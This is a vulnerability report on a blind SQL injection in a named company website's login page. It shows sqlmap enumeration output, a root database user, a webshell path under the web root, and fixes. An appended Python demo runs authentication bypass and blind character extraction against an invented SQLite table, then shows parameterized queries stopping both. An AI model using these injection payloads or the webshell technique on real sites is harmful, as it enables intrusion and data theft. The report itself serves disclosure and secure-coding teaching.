SQL injection on the Kimberlite Diamond official website
The official website of Kimberlite Diamond (www.kimberlite.com.cn) has a SQL injection that leads to a webshell.
Blind SQL injection, found and exploited with sqlmap
Injection point: the login page
http://www.kimberlite.com.cn/index.php?r=site/flogin
Enumerated databases (sqlmap output)
web application technology: PHP 5.6.15, Nginx
back-end DBMS: MySQL 5.0.11
available databases [6]:
[*] information_schema
[*] kella
[*] kimberlite
[*] mysql
[*] performance_schema
[*] test
Enumerated tables of the kimberlite database
Database: kimberlite
[25 tables]
+------------------+
| join             |
| user             |
| application      |
| brand            |
| caption          |
| classic          |
| classic_list     |
| config           |
| desginer         |
| desginer_list    |
| huodong          |
| images           |
| jiamengshang     |
| jm               |
| kd_list          |
| member           |
| new_push         |
| news             |
| picture          |
| product          |
| product_categroy |
| product_type     |
| source           |
| story_video      |
| zuanshi          |
+------------------+
Database user the application connects as
current user: 'root@%'
File write: the application connects as root, which has MySQL's FILE privilege, so sqlmap can write a file under the web root (--file-write for the local file, --file-dest for the server-side path). The written PHP file is reachable at:
--file-write http://www.kimberlite.com.cn/assets/197aed28/js.php
Webshell obtained.
Solution:
1. Minimize database user permissions. Do not connect the web application as root@%. Create a dedicated account with only the SELECT/INSERT/UPDATE/DELETE rights it needs on the kimberlite database and without the FILE privilege, and keep secure_file_priv set so MySQL cannot write files under the web root. The injection would still leak data, but it could not have been turned into a webshell.
2. Use precompiled (parameterized) statements for every query that takes user input, starting with the login form, so that input is bound as data and never parsed as SQL.
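As an added illustration (not part of the original report and not the site's own code), the following Python script reproduces both halves of the finding against a constructed in-memory SQLite stand-in for the user table: a login query built by string concatenation that can be bypassed and used as a boolean-based blind oracle to pull data out one character at a time, which is what sqlmap did above, and the same query as a parameterized statement, which stops both. The table and column names and the sample credential are invented; sqlmap's MySQL payloads use ASCII(SUBSTRING(...)) where this uses SQLite's unicode(substr(...)).

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's MySQL user table.
    The real schema is not on the page; the table/column names and the
    credential here are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO user (username, password) VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern behind the finding: user input is concatenated into the
    SQL text, so quotes and comment markers in the input are parsed as SQL."""
    sql = (
        f"SELECT id FROM user WHERE username = '{username}'"
        f" AND password = '{password}'"
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Precompiled (parameterized) statement: the SQL text is fixed and the
    input is bound as data, so it can never change the query structure."""
    sql = "SELECT id FROM user WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def blind_extract(oracle, expr, max_len=64):
    """Boolean-based blind extraction through a login form.

    `oracle(username)` returns True when the login query matched a row.
    `expr` is a scalar SQL subquery; its result is recovered one character
    at a time by asking "is character N of the result equal to code C?"
    (sqlmap's MySQL payloads use ASCII(SUBSTRING(...)); SQLite spells it
    unicode(substr(...)).) Returns "" when the oracle never answers True,
    which is what happens once the input is bound as data.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = None
        for code in range(32, 127):  # printable ASCII
            payload = (
                f"admin' AND unicode(substr(({expr}),{pos},1)) = {code} -- "
            )
            if oracle(payload):
                matched = chr(code)
                break
        if matched is None:  # past the end of the value: substr() returned ''
            break
        recovered += matched
    return recovered


if __name__ == "__main__":
    db = make_db()
    # Authentication bypass: the comment marker drops the password check.
    print("bypass, concatenated :", login_vulnerable(db, "admin' -- ", "wrong"))
    print("bypass, parameterized:", login_safe(db, "admin' -- ", "wrong"))
    secret = "SELECT password FROM user WHERE username = 'admin'"
    tables = "SELECT name FROM sqlite_master WHERE type = 'table'"
    vuln = lambda u: login_vulnerable(db, u, "x")
    safe = lambda u: login_safe(db, u, "x")
    print("blind table name     :", blind_extract(vuln, tables))
    print("blind password       :", blind_extract(vuln, secret))
    print("same against safe    :", repr(blind_extract(safe, secret)))
```

The extraction step needs no special database privilege, which is why the fix for the injection itself is the parameterized query rather than tighter grants. The file write that produced the webshell is different: sqlmap's --file-write on MySQL goes through SELECT ... INTO DUMPFILE, which needs the FILE privilege that root has and an application account should not.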